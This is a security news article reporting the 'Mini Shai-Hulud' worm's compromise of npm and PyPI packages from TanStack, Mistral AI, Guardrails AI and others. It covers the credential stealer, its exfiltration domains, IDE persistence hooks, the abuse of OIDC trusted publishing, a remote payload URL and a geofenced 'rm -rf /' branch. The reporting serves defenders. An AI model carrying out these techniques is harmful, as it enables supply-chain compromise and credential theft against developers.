Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages

Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages Ravie LakshmananMay 12, 2026Supply Chain Attack / Malware TeamPCP, the threat actor behind the recent supply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign. The affected npm packages have been modified to include an obfuscated JavaScript file ("router_init.js") that's designed to profile the execution environment and launch a comprehensive credential stealer capable of targeting cloud providers, cryptocurrency wallets, AI tools, messaging apps, and CI systems, including Github Actions, multiple reports from Aikido Security, Endor Labs, SafeDep, Socket, StepSecurity, and Snyk show. The data is exfiltrated to the "filev2.getsession[.]org" domain. Using Session Protocol infrastructure is a deliberate attempt on the part of the attackers to evade detection, as the domain is unlikely to be blocked within enterprise environments, given that it belongs to a decentralized, privacy-focused messaging service. As a fallback option, the encrypted data is committed to attacker-controlled repositories under the author name "claude@users.noreply.github.com" via the GitHub GraphQL API using the stolen GitHub tokens. The malware is also capable of establishing persistence hooks in Claude Code and Microsoft Visual Studio Code (VS Code) to survive reboots and re-execute the stealer on every launch of the IDEs. Furthermore, it installs a gh-token-monitor service to monitor and re-exfiltrate GitHub tokens, and injects two malicious GitHub Actions workflows to serialize repository secrets into a JSON object and upload the data to an external server ("api.masscan[.]cloud").  Unlike the previous SAP wave, where the compromised packages added a preinstall hook to trigger the infection sequence, the latest TanStack cluster adopts a different strategy by including a JavaScript file within the package tarball and adding an optional dependency that points to a GitHub-hosted package. The GitHub dependency contains a prepare lifecycle hook that executes the JavaScript payload via the Bun runtime. The updates to the Mistral AI packages, on the other hand, follow the earlier approach, replacing the contents of the "package.json" file with a preinstall hook to invoke "node setup.mjs," which downloads Bun and runs the same JavaScript malware. TanStack has since traced the compromise to a chained GitHub Actions attack involving the "pull_request_target" trigger, GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. "No npm tokens were stolen, and the npm publish workflow itself was not compromised," TanStack said. Specifically, the attackers are assessed to have staged the malicious payload in a GitHub fork via an orphaned commit, injected it into published npm tarballs, then hijacked the project's legitimate "TanStack/router" workflow to publish the compromised versions with valid SLSA provenance. The attack is noteworthy for the fact that it abuses trusted publishing, allowing attacker-controlled code running within a workflow to leverage its OIDC permissions to "mint" a short-lived publish token during the build and use it to publish the packages without having to steal an npm token. What makes the worm stand out is its ability to spread itself to other packages by locating a publishable npm token with bypass_2fa set to true, enumerating every package published by the same maintainer, and exchanging a GitHub OIDC token for a per-package publish token to sidestep traditional authentication entirely. "The orphaned commit additionally triggered a GitHub Actions workflow run against the legitimate TanStack/router workflow surface," Endor Labs researcher Peyton Kennedy said. "Because the repository's OIDC trusted publisher configuration granted trust at the repository level rather than scoped to a specific protected branch and workflow file, the workflow run triggered by that commit was able to request a valid short-lived npm publish token." The TanStack supply chain compromise has been assigned the CVE identifier CVE-2026-45321. It carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity. The incident has impacted 42 packages and 84 versions across the TanStack ecosystem. "The attack published malicious versions through the project's own GitHub Actions release pipeline using hijacked OIDC tokens," StepSecurity researcher Ashish Kurmi said. "In an extremely rare escalation, the compromised packages carry valid SLSA Build Level 3 provenance attestations, making this the first documented npm worm that produces validly attested malicious packages. The worm has since spread beyond TanStack to packages from UiPath, DraftLab, and other maintainers." Besides TanStack, the Mini Shai-Hulud campaign has also spread to several other packages, including some in PyPI - guardrails-ai@0.10.1 (PyPI) mistralai@2.4.6 (PyPI) @opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, and 3.8.0 @squawk/mcp@0.9.5 @squawk/weather@0.5.10 @squawk/flightplan@0.5.6 @tallyui/connector-medusa@1.0.1, 1.0.2, and 1.0.3 @tallyui/connector-vendure@1.0.1, 1.0.2, and 1.0.3 Microsoft, in its analysis of the malicious mistralai PyPI package, said it's designed to download a credential stealer from a remote server ("83.142.209[.]194") that includes country-aware logic to avoid Russian-language environments and a "geofenced destructive branch that has a 1-in-6 chance of executing rm -rf / when the system appears to be in Israel or Iran." "The guardrails-ai@0.10.1 compromise is especially notable because the malicious code executes on import," Socket said. "The package checks for Linux systems, downloads a remote Python artifact from https://git-tanstack.com/transformers.pyz, writes it to /tmp/transformers.pyz, and executes it with python3 without integrity verification." "This latest activity shows the campaign continuing to propagate across both npm and PyPI, with affected packages spanning search infrastructure, AI tooling, aviation-related developer packages, enterprise automation, frontend tooling, and CI/CD-adjacent ecosystems." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  Cloud security, Credential Theft, cybersecurity, GitHub Actions, Malware, NPM, Open Source, PyPI, supply chain attack, TanStack ⚡ Top Stories This Week ThreatsDay Bulletin: Edge Plaintext Passwords, ICS 0-Days, Patch-or-Die Alerts and 25+ New Stories Linux Kernel Dirty Frag LPE Exploit Enables Root Access Across Major Distributions We Scanned 1 Million Exposed AI Services. Here's How Bad the Security Actually Is ⚡ Weekly Recap: AI-Powered Phishing, Android Spying Tool, Linux Exploit, GitHub RCE and More Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE 30,000 Facebook Accounts Hacked via Google AppSheet Phishing Campaign Microsoft Details Phishing Campaign Targeting 35,000 Users Across 26 Countries Quasar Linux RAT Steals Developer Credentials for Software Supply Chain Compromise New Linux PamDOORa Backdoor Uses PAM Modules to Steal SSH Credentials Progress Patches Critical MOVEit Automation Bug Enabling Authentication Bypass Trellix Confirms Source Code Breach With Unauthorized Repository Access 2026: The Year of AI-Assisted Attacks The Hacker News Launches 'Cybersecurity Stars Awards 2026' — Submissions Now Open PAN-OS RCE Exploit Under Active Use Enabling Root Access and Espionage Day Zero Readiness: The Operational Gaps That Break Incident Response Palo Alto PAN-OS Flaw Under Active Exploitation Enables Remote Code Execution Load More ▼ ⭐ Featured Resources [Demo] Stop Email Attacks and Protect Cloud Workspace Data Faster [Guide] Get Practical AI SOC Insights to Improve Threat Detection [Webinar] Learn How Autonomous Validation Keeps Pace With AI Attacks [Demo] Discover How to Control Autonomous Identity Risks Effectively